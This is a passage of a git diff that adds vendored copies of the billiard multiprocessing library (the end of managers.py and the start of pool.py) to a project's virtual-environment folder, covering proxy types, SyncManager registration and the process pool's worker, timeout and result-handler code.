self._token, self._serializer, kwds)) + else: + return (RebuildProxy, + (type(self), self._token, self._serializer, kwds)) + + def __deepcopy__(self, memo): + return self._getvalue() + + def __repr__(self): + return '<%s object, typeid %r at %#x>' % \ + (type(self).__name__, self._token.typeid, id(self)) + + def __str__(self): + ''' + Return representation of the referent (or a fall-back if that fails) + ''' + try: + return self._callmethod('__repr__') + except Exception: + return repr(self)[:-1] + "; '__str__()' failed>" + +# +# Function used for unpickling +# + + +def RebuildProxy(func, token, serializer, kwds): + ''' + Function used for unpickling proxy objects. + + If possible the shared object is returned, or otherwise a proxy for it. + ''' + server = getattr(process.current_process(), '_manager_server', None) + + if server and server.address == token.address: + return server.id_to_obj[token.id][0] + else: + incref = ( + kwds.pop('incref', True) and + not getattr(process.current_process(), '_inheriting', False) + ) + return func(token, serializer, incref=incref, **kwds) + +# +# Functions to create proxies and proxy types +# + + +def MakeProxyType(name, exposed, _cache={}): + ''' + Return an proxy type whose methods are given by `exposed` + ''' + exposed = tuple(exposed) + try: + return _cache[(name, exposed)] + except KeyError: + pass + + dic = {} + + for meth in exposed: + exec('''def %s(self, *args, **kwds): + return self._callmethod(%r, args, kwds)''' % (meth, meth), dic) + + ProxyType = type(name, (BaseProxy,), dic) + ProxyType._exposed_ = exposed + _cache[(name, exposed)] = ProxyType + return ProxyType + + +def AutoProxy(token, serializer, manager=None, authkey=None, + exposed=None, incref=True): + ''' + Return an auto-proxy for `token` + ''' + _Client = listener_client[serializer][1] + + if exposed is None: + conn = _Client(token.address, authkey=authkey) + try: + exposed = dispatch(conn, None, 'get_methods', (token,)) + finally: + conn.close() + + if authkey is None and manager is not None: + authkey = manager._authkey + if authkey is None: + authkey = process.current_process().authkey + + ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed) + proxy = ProxyType(token, serializer, manager=manager, authkey=authkey, + incref=incref) + proxy._isauto = True + return proxy + +# +# Types/callables which we will register with SyncManager +# + + +class Namespace: + + def __init__(self, **kwds): + self.__dict__.update(kwds) + + def __repr__(self): + _items = list(self.__dict__.items()) + temp = [] + for name, value in _items: + if not name.startswith('_'): + temp.append('%s=%r' % (name, value)) + temp.sort() + return '%s(%s)' % (self.__class__.__name__, ', '.join(temp)) + + +class Value: + + def __init__(self, typecode, value, lock=True): + self._typecode = typecode + self._value = value + + def get(self): + return self._value + + def set(self, value): + self._value = value + + def __repr__(self): + return '%s(%r, %r)' % (type(self).__name__, + self._typecode, self._value) + value = property(get, set) + + +def Array(typecode, sequence, lock=True): + return array.array(typecode, sequence) + +# +# Proxy types used by SyncManager +# + + +class IteratorProxy(BaseProxy): + if sys.version_info[0] == 3: + _exposed = ('__next__', 'send', 'throw', 'close') + else: + _exposed_ = ('__next__', 'next', 'send', 'throw', 'close') + + def next(self, *args): + return self._callmethod('next', args) + + def __iter__(self): + return self + + def __next__(self, *args): + return self._callmethod('__next__', args) + + def send(self, *args): + return self._callmethod('send', args) + + def throw(self, *args): + return self._callmethod('throw', args) + + def close(self, *args): + return self._callmethod('close', args) + + +class AcquirerProxy(BaseProxy): + _exposed_ = ('acquire', 'release') + + def acquire(self, blocking=True, timeout=None): + args = (blocking, ) if timeout is None else (blocking, timeout) + return self._callmethod('acquire', args) + + def release(self): + return self._callmethod('release') + + def __enter__(self): + return self._callmethod('acquire') + + def __exit__(self, exc_type, exc_val, exc_tb): + return self._callmethod('release') + + +class ConditionProxy(AcquirerProxy): + _exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all') + + def wait(self, timeout=None): + return self._callmethod('wait', (timeout,)) + + def notify(self): + return self._callmethod('notify') + + def notify_all(self): + return self._callmethod('notify_all') + + def wait_for(self, predicate, timeout=None): + result = predicate() + if result: + return result + if timeout is not None: + endtime = monotonic() + timeout + else: + endtime = None + waittime = None + while not result: + if endtime is not None: + waittime = endtime - monotonic() + if waittime <= 0: + break + self.wait(waittime) + result = predicate() + return result + + +class EventProxy(BaseProxy): + _exposed_ = ('is_set', 'set', 'clear', 'wait') + + def is_set(self): + return self._callmethod('is_set') + + def set(self): + return self._callmethod('set') + + def clear(self): + return self._callmethod('clear') + + def wait(self, timeout=None): + return self._callmethod('wait', (timeout,)) + + +class BarrierProxy(BaseProxy): + _exposed_ = ('__getattribute__', 'wait', 'abort', 'reset') + + def wait(self, timeout=None): + return self._callmethod('wait', (timeout, )) + + def abort(self): + return self._callmethod('abort') + + def reset(self): + return self._callmethod('reset') + + @property + def parties(self): + return self._callmethod('__getattribute__', ('parties', )) + + @property + def n_waiting(self): + return self._callmethod('__getattribute__', ('n_waiting', )) + + @property + def broken(self): + return self._callmethod('__getattribute__', ('broken', )) + + +class NamespaceProxy(BaseProxy): + _exposed_ = ('__getattribute__', '__setattr__', '__delattr__') + + def __getattr__(self, key): + if key[0] == '_': + return object.__getattribute__(self, key) + callmethod = object.__getattribute__(self, '_callmethod') + return callmethod('__getattribute__', (key,)) + + def __setattr__(self, key, value): + if key[0] == '_': + return object.__setattr__(self, key, value) + callmethod = object.__getattribute__(self, '_callmethod') + return callmethod('__setattr__', (key, value)) + + def __delattr__(self, key): + if key[0] == '_': + return object.__delattr__(self, key) + callmethod = object.__getattribute__(self, '_callmethod') + return callmethod('__delattr__', (key,)) + + +class ValueProxy(BaseProxy): + _exposed_ = ('get', 'set') + + def get(self): + return self._callmethod('get') + + def set(self, value): + return self._callmethod('set', (value,)) + value = property(get, set) + + +_ListProxy_Attributes = ( + '__add__', '__contains__', '__delitem__', '__getitem__', '__len__', + '__mul__', '__reversed__', '__rmul__', '__setitem__', + 'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove', + 'reverse', 'sort', '__imul__', +) +if not PY3: + _ListProxy_Attributes += ('__getslice__', '__setslice__', '__delslice__') +BaseListProxy = MakeProxyType('BaseListProxy', _ListProxy_Attributes) + + +class ListProxy(BaseListProxy): + + def __iadd__(self, value): + self._callmethod('extend', (value,)) + return self + + def __imul__(self, value): + self._callmethod('__imul__', (value,)) + return self + + +DictProxy = MakeProxyType('DictProxy', ( + '__contains__', '__delitem__', '__getitem__', '__len__', + '__setitem__', 'clear', 'copy', 'get', 'has_key', 'items', + 'keys', 'pop', 'popitem', 'setdefault', 'update', 'values', +)) + + +_ArrayProxy_Attributes = ( + '__len__', '__getitem__', '__setitem__', +) +if not PY3: + _ArrayProxy_Attributes += ('__getslice__', '__setslice__') +ArrayProxy = MakeProxyType('ArrayProxy', _ArrayProxy_Attributes) + + +BasePoolProxy = MakeProxyType('PoolProxy', ( + 'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join', + 'map', 'map_async', 'starmap', 'starmap_async', 'terminate', +)) +BasePoolProxy._method_to_typeid_ = { + 'apply_async': 'AsyncResult', + 'map_async': 'AsyncResult', + 'starmap_async': 'AsyncResult', + 'imap': 'Iterator', + 'imap_unordered': 'Iterator', +} + + +class PoolProxy(BasePoolProxy): + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self.terminate() + + +# +# Definition of SyncManager +# + + +class SyncManager(BaseManager): + ''' + Subclass of `BaseManager` which supports a number of shared object types. + + The types registered are those intended for the synchronization + of threads, plus `dict`, `list` and `Namespace`. + + The `billiard.Manager()` function creates started instances of + this class. + ''' + +SyncManager.register('Queue', Queue) +SyncManager.register('JoinableQueue', Queue) +SyncManager.register('Event', threading.Event, EventProxy) +SyncManager.register('Lock', threading.Lock, AcquirerProxy) +SyncManager.register('RLock', threading.RLock, AcquirerProxy) +SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy) +SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore, + AcquirerProxy) +SyncManager.register('Condition', threading.Condition, ConditionProxy) +if hasattr(threading, 'Barrier'): # PY3 + SyncManager.register('Barrier', threading.Barrier, BarrierProxy) +SyncManager.register('Pool', pool.Pool, PoolProxy) +SyncManager.register('list', list, ListProxy) +SyncManager.register('dict', dict, DictProxy) +SyncManager.register('Value', Value, ValueProxy) +SyncManager.register('Array', Array, ArrayProxy) +SyncManager.register('Namespace', Namespace, NamespaceProxy) + +# types returned by methods of PoolProxy +SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False) +SyncManager.register('AsyncResult', create_method=False) diff --git a/env/Lib/site-packages/billiard/pool.py b/env/Lib/site-packages/billiard/pool.py new file mode 100644 index 00000000..f8d477bf --- /dev/null +++ b/env/Lib/site-packages/billiard/pool.py @@ -0,0 +1,2052 @@ +# +# Module providing the `Pool` class for managing a process pool +# +# multiprocessing/pool.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +# +# Imports +# +import copy +import errno +import itertools +import os +import platform +import signal +import sys +import threading +import time +import warnings + +from collections import deque +from functools import partial + +from . import cpu_count, get_context +from . import util +from .common import ( + TERM_SIGNAL, human_status, pickle_loads, reset_signals, restart_state, +) +from .compat import get_errno, mem_rss, send_offset +from .einfo import ExceptionInfo +from .dummy import DummyProcess +from .exceptions import ( + CoroStop, + RestartFreqExceeded, + SoftTimeLimitExceeded, + Terminated, + TimeLimitExceeded, + TimeoutError, + WorkerLostError, +) +from time import monotonic +from queue import Queue, Empty +from .util import Finalize, debug, warning + +MAXMEM_USED_FMT = """\ +child process exiting after exceeding memory limit ({0}KiB / {1}KiB) +""" + +PY3 = sys.version_info[0] == 3 + +if platform.system() == 'Windows': # pragma: no cover + # On Windows os.kill calls TerminateProcess which cannot be + # handled by # any process, so this is needed to terminate the task + # *and its children* (if any). + from ._win import kill_processtree as _kill # noqa + SIGKILL = TERM_SIGNAL +else: + from os import kill as _kill # noqa + SIGKILL = signal.SIGKILL + + +try: + TIMEOUT_MAX = threading.TIMEOUT_MAX +except AttributeError: # pragma: no cover + TIMEOUT_MAX = 1e10 # noqa + + +if sys.version_info >= (3, 3): + _Semaphore = threading.Semaphore +else: + # Semaphore is a factory function pointing to _Semaphore + _Semaphore = threading._Semaphore # noqa + +# +# Constants representing the state of a pool +# + +RUN = 0 +CLOSE = 1 +TERMINATE = 2 + +# +# Constants representing the state of a job +# + +ACK = 0 +READY = 1 +TASK = 2 +NACK = 3 +DEATH = 4 + +# +# Exit code constants +# +EX_OK = 0 +EX_FAILURE = 1 +EX_RECYCLE = 0x9B + + +# Signal used for soft time limits. +SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None) + +# +# Miscellaneous +# + +LOST_WORKER_TIMEOUT = 10.0 +EX_OK = getattr(os, "EX_OK", 0) +GUARANTEE_MESSAGE_CONSUMPTION_RETRY_LIMIT = 300 +GUARANTEE_MESSAGE_CONSUMPTION_RETRY_INTERVAL = 0.1 + +job_counter = itertools.count() + +Lock = threading.Lock + + +def _get_send_offset(connection): + try: + native = connection.send_offset + except AttributeError: + native = None + if native is None: + return partial(send_offset, connection.fileno()) + return native + + +def mapstar(args): + return list(map(*args)) + + +def starmapstar(args): + return list(itertools.starmap(args[0], args[1])) + + +def error(msg, *args, **kwargs): + util.get_logger().error(msg, *args, **kwargs) + + +def stop_if_not_current(thread, timeout=None): + if thread is not threading.current_thread(): + thread.stop(timeout) + + +class LaxBoundedSemaphore(_Semaphore): + """Semaphore that checks that # release is <= # acquires, + but ignores if # releases >= value.""" + + def shrink(self): + self._initial_value -= 1 + self.acquire() + + if PY3: + + def __init__(self, value=1, verbose=None): + _Semaphore.__init__(self, value) + self._initial_value = value + + def grow(self): + with self._cond: + self._initial_value += 1 + self._value += 1 + self._cond.notify() + + def release(self): + cond = self._cond + with cond: + if self._value < self._initial_value: + self._value += 1 + cond.notify_all() + + def clear(self): + while self._value < self._initial_value: + _Semaphore.release(self) + else: + + def __init__(self, value=1, verbose=None): + _Semaphore.__init__(self, value, verbose) + self._initial_value = value + + def grow(self): + cond = self._Semaphore__cond + with cond: + self._initial_value += 1 + self._Semaphore__value += 1 + cond.notify() + + def release(self): # noqa + cond = self._Semaphore__cond + with cond: + if self._Semaphore__value < self._initial_value: + self._Semaphore__value += 1 + cond.notifyAll() + + def clear(self): # noqa + while self._Semaphore__value < self._initial_value: + _Semaphore.release(self) + +# +# Exceptions +# + + +class MaybeEncodingError(Exception): + """Wraps possible unpickleable errors, so they can be + safely sent through the socket.""" + + def __init__(self, exc, value): + self.exc = repr(exc) + self.value = repr(value) + super().__init__(self.exc, self.value) + + def __repr__(self): + return "<%s: %s>" % (self.__class__.__name__, str(self)) + + def __str__(self): + return "Error sending result: '%r'. Reason: '%r'." % ( + self.value, self.exc) + + +class WorkersJoined(Exception): + """All workers have terminated.""" + + +def soft_timeout_sighandler(signum, frame): + raise SoftTimeLimitExceeded() + +# +# Code run by worker processes +# + + +class Worker: + + def __init__(self, inq, outq, synq=None, initializer=None, initargs=(), + maxtasks=None, sentinel=None, on_exit=None, + sigprotection=True, wrap_exception=True, + max_memory_per_child=None, on_ready_counter=None): + assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0) + self.initializer = initializer + self.initargs = initargs + self.maxtasks = maxtasks + self.max_memory_per_child = max_memory_per_child + self._shutdown = sentinel + self.on_exit = on_exit + self.sigprotection = sigprotection + self.inq, self.outq, self.synq = inq, outq, synq + self.wrap_exception = wrap_exception # XXX cannot disable yet + self.on_ready_counter = on_ready_counter + self.contribute_to_object(self) + + def contribute_to_object(self, obj): + obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq + obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd + obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd + if self.synq: + obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd + obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd + obj.send_syn_offset = _get_send_offset(self.synq._writer) + else: + obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None + obj._quick_put = self.inq._writer.send + obj._quick_get = self.outq._reader.recv + obj.send_job_offset = _get_send_offset(self.inq._writer) + return obj + + def __reduce__(self): + return self.__class__, ( + self.inq, self.outq, self.synq, self.initializer, + self.initargs, self.maxtasks, self._shutdown, self.on_exit, + self.sigprotection, self.wrap_exception, self.max_memory_per_child, + ) + + def __call__(self): + _exit = sys.exit + _exitcode = [None] + + def exit(status=None): + _exitcode[0] = status + return _exit(status) + sys.exit = exit + + pid = os.getpid() + + self._make_child_methods() + self.after_fork() + self.on_loop_start(pid=pid) # callback on loop start + try: + sys.exit(self.workloop(pid=pid)) + except Exception as exc: + error('Pool process %r error: %r', self, exc, exc_info=1) + self._do_exit(pid, _exitcode[0], exc) + finally: + self._do_exit(pid, _exitcode[0], None) + + def _do_exit(self, pid, exitcode, exc=None): + if exitcode is None: + exitcode = EX_FAILURE if exc else EX_OK + + if self.on_exit is not None: + self.on_exit(pid, exitcode) + + if sys.platform != 'win32': + try: + self.outq.put((DEATH, (pid, exitcode))) + time.sleep(1) + finally: + os._exit(exitcode) + else: + os._exit(exitcode) + + def on_loop_start(self, pid): + pass + + def prepare_result(self, result): + return result + + def workloop(self, debug=debug, now=monotonic, pid=None): + pid = pid or os.getpid() + put = self.outq.put + inqW_fd = self.inqW_fd + synqW_fd = self.synqW_fd + maxtasks = self.maxtasks + max_memory_per_child = self.max_memory_per_child or 0 + prepare_result = self.prepare_result + + wait_for_job = self.wait_for_job + _wait_for_syn = self.wait_for_syn + + def wait_for_syn(jid): + i = 0 + while 1: + if i > 60: + error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!', + jid, self.synq._reader.fileno(), exc_info=1) + req = _wait_for_syn() + if req: + type_, args = req + if type_ == NACK: + return False + assert type_ == ACK + return True + i += 1 + + completed = 0 + try: + while maxtasks is None or (maxtasks and completed < maxtasks): + req = wait_for_job() + if req: + type_, args_ = req + assert type_ == TASK + job, i, fun, args, kwargs = args_ + put((ACK, (job, i, now(), pid, synqW_fd))) + if _wait_for_syn: + confirm = wait_for_syn(job) + if not confirm: + continue # received NACK + try: + result = (True, prepare_result(fun(*args, **kwargs))) + except Exception: + result = (False, ExceptionInfo()) + try: + put((READY, (job, i, result, inqW_fd))) + except Exception as exc: + _, _, tb = sys.exc_info() + try: + wrapped = MaybeEncodingError(exc, result[1]) + einfo = ExceptionInfo(( + MaybeEncodingError, wrapped, tb, + )) + put((READY, (job, i, (False, einfo), inqW_fd))) + finally: + del(tb) + completed += 1 + if max_memory_per_child > 0: + used_kb = mem_rss() + if used_kb <= 0: + error('worker unable to determine memory usage') + if used_kb > 0 and used_kb > max_memory_per_child: + warning(MAXMEM_USED_FMT.format( + used_kb, max_memory_per_child)) + return EX_RECYCLE + + debug('worker exiting after %d tasks', completed) + if maxtasks: + return EX_RECYCLE if completed == maxtasks else EX_FAILURE + return EX_OK + finally: + # Before exiting the worker, we want to ensure that that all + # messages produced by the worker have been consumed by the main + # process. This prevents the worker being terminated prematurely + # and messages being lost. + self._ensure_messages_consumed(completed=completed) + + def _ensure_messages_consumed(self, completed): + """ Returns true if all messages sent out have been received and + consumed within a reasonable amount of time """ + + if not self.on_ready_counter: + return False + + for retry in range(GUARANTEE_MESSAGE_CONSUMPTION_RETRY_LIMIT): + if self.on_ready_counter.value >= completed: + debug('ensured messages consumed after %d retries', retry) + return True + time.sleep(GUARANTEE_MESSAGE_CONSUMPTION_RETRY_INTERVAL) + warning('could not ensure all messages were consumed prior to ' + 'exiting') + return False + + def after_fork(self): + if hasattr(self.inq, '_writer'): + self.inq._writer.close() + if hasattr(self.outq, '_reader'): + self.outq._reader.close() + + if self.initializer is not None: + self.initializer(*self.initargs) + + # Make sure all exiting signals call finally: blocks. + # This is important for the semaphore to be released. + reset_signals(full=self.sigprotection) + + # install signal handler for soft timeouts. + if SIG_SOFT_TIMEOUT is not None: + signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler) + + try: + signal.signal(signal.SIGINT, signal.SIG_IGN) + except AttributeError: + pass + + def _make_recv_method(self, conn): + get = conn.get + + if hasattr(conn, '_reader'): + _poll = conn._reader.poll + if hasattr(conn, 'get_payload') and conn.get_payload: + get_payload = conn.get_payload + + def _recv(timeout, loads=pickle_loads): + return True, loads(get_payload()) + else: + def _recv(timeout): # noqa + if _poll(timeout): + return True, get() + return False, None + else: + def _recv(timeout): # noqa + try: + return True, get(timeout=timeout) + except Queue.Empty: + return False, None + return _recv + + def _make_child_methods(self, loads=pickle_loads): + self.wait_for_job = self._make_protected_receive(self.inq) + self.wait_for_syn = (self._make_protected_receive(self.synq) + if self.synq else None) + + def _make_protected_receive(self, conn): + _receive = self._make_recv_method(conn) + should_shutdown = self._shutdown.is_set if self._shutdown else None + + def receive(debug=debug): + if should_shutdown and should_shutdown(): + debug('worker got sentinel -- exiting') + raise SystemExit(EX_OK) + try: + ready, req = _receive(1.0) + if not ready: + return None + except (EOFError, IOError) as exc: + if get_errno(exc) == errno.EINTR: + return None # interrupted, maybe by gdb + debug('worker got %s -- exiting', type(exc).__name__) + raise SystemExit(EX_FAILURE) + if req is None: + debug('worker got sentinel -- exiting') + raise SystemExit(EX_FAILURE) + return req + + return receive + + +# +# Class representing a process pool +# + + +class PoolThread(DummyProcess): + + def __init__(self, *args, **kwargs): + DummyProcess.__init__(self) + self._state = RUN + self._was_started = False + self.daemon = True + + def run(self): + try: + return self.body() + except RestartFreqExceeded as exc: + error("Thread %r crashed: %r", type(self).__name__, exc, + exc_info=1) + _kill(os.getpid(), TERM_SIGNAL) + sys.exit() + except Exception as exc: + error("Thread %r crashed: %r", type(self).__name__, exc, + exc_info=1) + os._exit(1) + + def start(self, *args, **kwargs): + self._was_started = True + super(PoolThread, self).start(*args, **kwargs) + + def on_stop_not_started(self): + pass + + def stop(self, timeout=None): + if self._was_started: + self.join(timeout) + return + self.on_stop_not_started() + + def terminate(self): + self._state = TERMINATE + + def close(self): + self._state = CLOSE + + +class Supervisor(PoolThread): + + def __init__(self, pool): + self.pool = pool + super().__init__() + + def body(self): + debug('worker handler starting') + + time.sleep(0.8) + + pool = self.pool + + try: + # do a burst at startup to verify that we can start + # our pool processes, and in that time we lower + # the max restart frequency. + prev_state = pool.restart_state + pool.restart_state = restart_state(10 * pool._processes, 1) + for _ in range(10): + if self._state == RUN and pool._state == RUN: + pool._maintain_pool() + time.sleep(0.1) + + # Keep maintaining workers until the cache gets drained, unless + # the pool is terminated + pool.restart_state = prev_state + while self._state == RUN and pool._state == RUN: + pool._maintain_pool() + time.sleep(0.8) + except RestartFreqExceeded: + pool.close() + pool.join() + raise + debug('worker handler exiting') + + +class TaskHandler(PoolThread): + + def __init__(self, taskqueue, put, outqueue, pool, cache): + self.taskqueue = taskqueue + self.put = put + self.outqueue = outqueue + self.pool = pool + self.cache = cache + super().__init__() + + def body(self): + cache = self.cache + taskqueue = self.taskqueue + put = self.put + + for taskseq, set_length in iter(taskqueue.get, None): + task = None + i = -1 + try: + for i, task in enumerate(taskseq): + if self._state: + debug('task handler found thread._state != RUN') + break + try: + put(task) + except IOError: + debug('could not put task on queue') + break + except Exception: + job, ind = task[:2] + try: + cache[job]._set(ind, (False, ExceptionInfo())) + except KeyError: + pass + else: + if set_length: + debug('doing set_length()') + set_length(i + 1) + continue + break + except Exception: + job, ind = task[:2] if task else (0, 0) + if job in cache: + cache[job]._set(ind + 1, (False, ExceptionInfo())) + if set_length: + util.debug('doing set_length()') + set_length(i + 1) + else: + debug('task handler got sentinel') + + self.tell_others() + + def tell_others(self): + outqueue = self.outqueue + put = self.put + pool = self.pool + + try: + # tell result handler to finish when cache is empty + debug('task handler sending sentinel to result handler') + outqueue.put(None) + + # tell workers there is no more work + debug('task handler sending sentinel to workers') + for p in pool: + put(None) + except IOError: + debug('task handler got IOError when sending sentinels') + + debug('task handler exiting') + + def on_stop_not_started(self): + self.tell_others() + + +class TimeoutHandler(PoolThread): + + def __init__(self, processes, cache, t_soft, t_hard): + self.processes = processes + self.cache = cache + self.t_soft = t_soft + self.t_hard = t_hard + self._it = None + super().__init__() + + def _process_by_pid(self, pid): + return next(( + (proc, i) for i, proc in enumerate(self.processes) + if proc.pid == pid + ), (None, None)) + + def on_soft_timeout(self, job): + debug('soft time limit exceeded for %r', job) + process, _index = self._process_by_pid(job._worker_pid) + if not process: + return + + # Run timeout callback + job.handle_timeout(soft=True) + + try: + _kill(job._worker_pid, SIG_SOFT_TIMEOUT) + except OSError as exc: + if get_errno(exc) != errno.ESRCH: + raise + + def on_hard_timeout(self, job): + if job.ready(): + return + debug('hard time limit exceeded for %r', job) + # Remove from cache and set return value to an exception + try: + raise TimeLimitExceeded(job._timeout) + except TimeLimitExceeded: + job._set(job._job, (False, ExceptionInfo())) + else: # pragma: no cover + pass + + # Remove from _pool + process, _index = self._process_by_pid(job._worker_pid) + + # Run timeout callback + job.handle_timeout(soft=False) + + if process: + self._trywaitkill(process) + + def _trywaitkill(self, worker): + debug('timeout: sending TERM to %s', worker._name) + try: + if os.getpgid(worker.pid) == worker.pid: + debug("worker %s is a group leader. It is safe to kill (SIGTERM) the whole group", worker.pid) + os.killpg(os.getpgid(worker.pid), signal.SIGTERM) + else: + worker.terminate() + except OSError: + pass + else: + if worker._popen.wait(timeout=0.1): + return + debug('timeout: TERM timed-out, now sending KILL to %s', worker._name) + try: + if os.getpgid(worker.pid) == worker.pid: + debug("worker %s is a group leader. It is safe to kill (SIGKILL) the whole group", worker.pid) + os.killpg(os.getpgid(worker.pid), signal.SIGKILL) + else: + _kill(worker.pid, SIGKILL) + except OSError: + pass + + def handle_timeouts(self): + t_hard, t_soft = self.t_hard, self.t_soft + dirty = set() + on_soft_timeout = self.on_soft_timeout + on_hard_timeout = self.on_hard_timeout + + def _timed_out(start, timeout): + if not start or not timeout: + return False + if monotonic() >= start + timeout: + return True + + # Inner-loop + while self._state == RUN: + # Perform a shallow copy before iteration because keys can change. + # A deep copy fails (on shutdown) due to thread.lock objects. + # https://github.com/celery/billiard/issues/260 + cache = copy.copy(self.cache) + + # Remove dirty items not in cache anymore + if dirty: + dirty = set(k for k in dirty if k in cache) + + for i, job in cache.items(): + ack_time = job._time_accepted + soft_timeout = job._soft_timeout + if soft_timeout is None: + soft_timeout = t_soft + hard_timeout = job._timeout + if hard_timeout is None: + hard_timeout = t_hard + if _timed_out(ack_time, hard_timeout): + on_hard_timeout(job) + elif i not in dirty and _timed_out(ack_time, soft_timeout): + on_soft_timeout(job) + dirty.add(i) + yield + + def body(self): + while self._state == RUN: + try: + for _ in self.handle_timeouts(): + time.sleep(1.0) # don't spin + except CoroStop: + break + debug('timeout handler exiting') + + def handle_event(self, *args): + if self._it is None: + self._it = self.handle_timeouts() + try: + next(self._it) + except StopIteration: + self._it = None + + +class ResultHandler(PoolThread): + + def __init__(self, outqueue, get, cache, poll, + join_exited_workers, putlock, restart_state, + check_timeouts, on_job_ready, on_ready_counters=None): + self.outqueue = outqueue + self.get = get + self.cache = cache + self.poll = poll + self.join_exited_workers = join_exited_workers + self.putlock = putlock + self.restart_state = restart_state + self._it = None + self._shutdown_complete = False + self.check_timeouts = check_timeouts + self.on_job_ready = on_job_ready + self.on_ready_counters = on_ready_counters + self._make_methods() + super().__init__() + + def on_stop_not_started(self): + # used when pool started without result handler thread. + self.finish_at_shutdown(handle_timeouts=True) + + def _make_methods(self): + cache = self.cache + putlock = self.putlock + restart_state = self.restart_state + on_job_ready = self.on_job_ready + + def on_ack(job, i, time_accepted, pid, synqW_fd): + restart_state.R = 0 + try: + cache[job]._ack(i, time_accepted, pid, synqW_fd) + except (KeyError, AttributeError): + # Object gone or doesn't support _ack (e.g. IMAPIterator). + pass + + def on_ready(job, i, obj, inqW_fd): + if on_job_ready is not None: + on_job_ready(job, i, obj, inqW_fd) + try: + item = cache[job] + except KeyError: + return + + if self.on_ready_counters: + worker_pid = next(iter(item.worker_pids()), None) + if worker_pid and worker_pid in self.on_ready_counters: + on_ready_counter = self.on_ready_counters[worker_pid] + with on_ready_counter.get_lock(): + on_ready_counter.value += 1 + + if not item.ready(): + if putlock is not None: + putlock.release() + try: + item._set(i, obj) + except KeyError: + pass + + def on_death(pid, exitcode): + try: + os.kill(pid, TERM_SIGNAL) + except OSError as exc: + if get_errno(exc) != errno.ESRCH: + raise + + state_handlers = self.state_handlers = { + ACK: on_ack, READY: on_ready, DEATH: on_death + } + + def on_state_change(task): + state, args = task + try: + state_handlers[state](*args) + except KeyError: + debug("Unknown job state: %s (args=%s)", state, args) + self.on_state_change = on_state_change + + def _process_result(self, timeout=1.0): + poll = self.poll + on_state_change = self.on_state_change + + while 1: + try: + ready, task = poll(timeout) + except (IOError, EOFError) as exc: + debug('result handler got %r -- exiting', exc) + raise CoroStop() + + if self._state: + assert self._state == TERMINATE + debug('result handler found thread._state=TERMINATE') + raise CoroStop() + + if ready: + if task is None: + debug('result handler got sentinel') + raise CoroStop() + on_state_change(task) + if timeout != 0: # blocking + break + else: + break + yield + + def handle_event(self, fileno=None, events=None): + if self._state == RUN: + if self._it is None: + self._it = self._process_result(0) # non-blocking + try: + next(self._it) + except (StopIteration, CoroStop): + self._it = None + + def body(self): + debug('result handler starting') + try: + while self._state == RUN: + try: + for _ in self._process_result(1.0): # blocking + pass + except CoroStop: + break + finally: + self.finish_at_shutdown() + + def finish_at_shutdown(self, handle_timeouts=False): + self._shutdown_complete = True + get = self.get + outqueue = self.outqueue + cache = self.cache + poll = self.poll + join_exited_workers = self.join_exited_workers + check_timeouts = self.check_timeouts + on_state_change = self.on_state_change + + time_terminate = None + while cache and self._state != TERMINATE: + if check_timeouts is not None: + check_timeouts() + try: + ready, task = poll(1.0) + except (IOError, EOFError) as exc: + debug('result handler got %r -- exiting', exc) + return + + if ready: + if task is None: + debug('result handler ignoring extra sentinel') + continue + + on_state_change(task) + try: + join_exited_workers(shutdown=True) + except WorkersJoined: + now = monotonic() + if not time_terminate: + time_terminate = now + else: + if now - time_terminate > 5.0: + debug('result handler exiting: timed out') + break + debug('result handler: all workers terminated, ' + 'timeout in %ss', + abs(min(now - time_terminate - 5.0, 0))) + + if hasattr(outqueue, '_reader'): + debug('ensuring that outqueue is not full') + # If we don't make room available in outqueue then + # attempts to add the sentinel (None) to outqueue may + # block. There is guaranteed to be no more than 2 sentinels. + try: + for i in range(10): + if not outqueue._reader.poll(): + break + get() + except (IOError, EOFError): + pass + + debug('result handler exiting: len(cache)=%s, thread._state=%s', + len(cache), self._state) + + +class Pool: + ''' + Class which supports an async version of applying functions to arguments. + ''' + _wrap_exception = True + Worker = Worker + Supervisor = Supervisor + TaskHandler = TaskHandler + TimeoutHandler = TimeoutHandler + ResultHandler = ResultHandler + SoftTimeLimitExceeded = SoftTimeLimitExceeded + + def __init__(self, processes=None, initializer=None, initargs=(), + maxtasksperchild=None, timeout=None, soft_timeout=None, + lost_worker_timeout=None, + max_restarts=None, max_restart_freq=1, + on_process_up=None, + on_process_down=None, + on_timeout_set=None, + on_timeout_cancel=None, + threads=True, + semaphore=None, + putlocks=False, + allow_restart=False, + synack=False, + on_process_exit=None, + context=None, + max_memory_per_child=None, + enable_timeouts=False, + **kwargs): + self._ctx = context or get_context() + self.synack = synack + self._setup_queues() + self._taskqueue = Queue() + self._cache = {} + self._state = RUN + self.timeout = timeout + self.soft_timeout = soft_timeout + self._maxtasksperchild = maxtasksperchild + self._max_memory_per_child = max_memory_per_child + self._initializer = initializer + self._initargs = initargs + self._on_process_exit = on_process_exit + self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT + self.on_process_up = on_process_up + self.on_process_down = on_process_down + self.on_timeout_set = on_timeout_set + self.on_timeout_cancel = on_timeout_cancel + self.threads = threads + self.readers = {} + self.allow_restart = allow_restart + + self.enable_timeouts = bool( + enable_timeouts or + self.timeout is not None or + self.soft_timeout is not None + ) + + if soft_timeout and SIG_SOFT_TIMEOUT is None: + warnings.warn(UserWarning( + "Soft timeouts are not supported: " + "on this platform: It does not have the SIGUSR1 signal.", + )) + soft_timeout = None + + self._processes = 